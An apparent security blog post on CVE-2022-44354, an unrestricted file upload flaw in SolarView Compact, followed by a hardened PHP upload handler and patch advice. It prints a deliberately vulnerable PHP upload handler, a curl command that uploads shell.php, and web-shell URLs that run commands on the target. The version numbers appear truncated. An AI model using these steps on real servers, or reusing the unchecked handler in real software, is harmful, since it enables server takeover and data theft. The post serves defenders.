SolarView Compact is a popular solar power monitoring platform, often found in smart buildings and renewable installations. In 2022, a dangerous vulnerability (CVE-2022-44354) came to light: Unrestricted File Upload in versions 4. and 5.. This bug lets an attacker upload any files—including malicious PHP scripts—directly onto the server. If you’re a system admin, a pentester, or just curious about web security, you need to know how this works and how to protect yourself.

What is CVE-2022-44354?

CVE-2022-44354 is classified as an “Unrestricted File Upload” vulnerability. This means there aren’t proper checks on what kind of files can be uploaded. If exploited, a hacker could upload a PHP file that contains malicious code. As soon as this file is executed on the server, the attacker could get full access—running commands, stealing sensitive data, or even pivoting to other internal systems.

Let’s dive into the code.

Suppose SolarView has an upload feature in its admin dashboard or a web form. Secure upload handlers usually restrict uploads to safe file types (such as .jpg or .png) and check file contents. In SolarView Compact 4. and 5., that didn’t happen.

Here’s a simplified PHP upload handler that’s vulnerable:

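<?php
// Deliberately vulnerable: shown to illustrate the missing checks.
if(isset($_FILES['uploadedfile'])){
    // Destination is inside the web root, so anything stored here is served (and .php is executed).
    $upload_dir = "uploads/";
    // basename() strips directory components, but the client-chosen name and extension are kept.
    $target_file = $upload_dir . basename($_FILES['uploadedfile']['name']);
    // No extension allow-list, no content inspection, no size limit before the move.
    if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_file)){
        echo "File uploaded!";
    } else {
        echo "Upload failed!";
    }
}
?>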

See the problem? There’s *no check* to filter dangerous file types or check file contents.

Upload the Malicious File

Use the vulnerable form to upload shell.php. The server puts it in the web-accessible uploads/ directory.

Access your webshell by browsing to:

http://target-server/uploads/shell.php?cmd=whoami

Let’s see a live request using curl:

curl -F 'uploadedfile=@shell.php' http://target-server/upload.php

After uploading, visit:

http://target-server/uploads/shell.php?cmd=id

If you see the result of the id command, the server is compromised.

- Data theft: Sensitive logs, credentials, or keys exposed.

- Pivoting: Attackers could use this entry point to compromise other devices or systems in your network.

How to Fix

Patch your SolarView Compact system! The vendor has been notified. As of this writing, check for updates at SolarView’s Official Site or review JPCert’s Vulnerability Note.
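If you maintain your own upload handlers, the checks missing from the simplified handler shown earlier look like this. This is an added example, not SolarView's code or the vendor's fix; the storage path, size limit, allowed types and the function name `store_upload` are assumptions.

```php
<?php
declare(strict_types=1);

// Assumed values for this example, not taken from SolarView Compact.
const UPLOAD_DIR = '/var/lib/app/uploads'; // outside the web root, never served directly
const MAX_BYTES  = 2 * 1024 * 1024;
const ALLOWED    = ['jpg' => 'image/jpeg', 'png' => 'image/png'];

function store_upload(array $file): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload error');
    }
    if ($file['size'] <= 0 || $file['size'] > MAX_BYTES) {
        throw new RuntimeException('size not allowed');
    }
    // The client-supplied name is used only to look up an allow-list entry.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!array_key_exists($ext, ALLOWED)) {
        throw new RuntimeException('extension not allowed');
    }
    // Sniff the type from the bytes; $_FILES[...]['type'] is client-controlled.
    // getimagesize() additionally requires a parseable image header.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if ($mime !== ALLOWED[$ext] || getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('content does not match extension');
    }
    // Server-chosen random name: an image with embedded script text still
    // lands as <random>.jpg/.png outside the web root and is never interpreted.
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($file['tmp_name'], UPLOAD_DIR . '/' . $name)) {
        throw new RuntimeException('could not store file');
    }
    return $name;
}

if (isset($_FILES['uploadedfile'])) {
    try {
        store_upload($_FILES['uploadedfile']);
        echo "File uploaded!";
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo "Upload failed!";
    }
}
```

If uploads must stay under the web root, the web server also needs script execution disabled for that directory.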

- CVE-2022-44354 at NVD
- JPCert Advisory
- Exploit Details at Packet Storm
- SolarView Compact Vendor Site
- Understanding Unrestricted File Uploads (OWASP)

Final Thoughts

Unrestricted file upload bugs like CVE-2022-44354 are one of the easiest ways for bad actors to break into critical systems. If you’re running SolarView Compact, update as soon as possible and always verify what files are making it onto your server. Don’t wait until an intruder turns out the lights!

Stay safe, patch often, and audit your web applications!

Timeline

Published on: 11/29/2022 17:15:00 UTC
Last modified on: 12/01/2022 20:01:00 UTC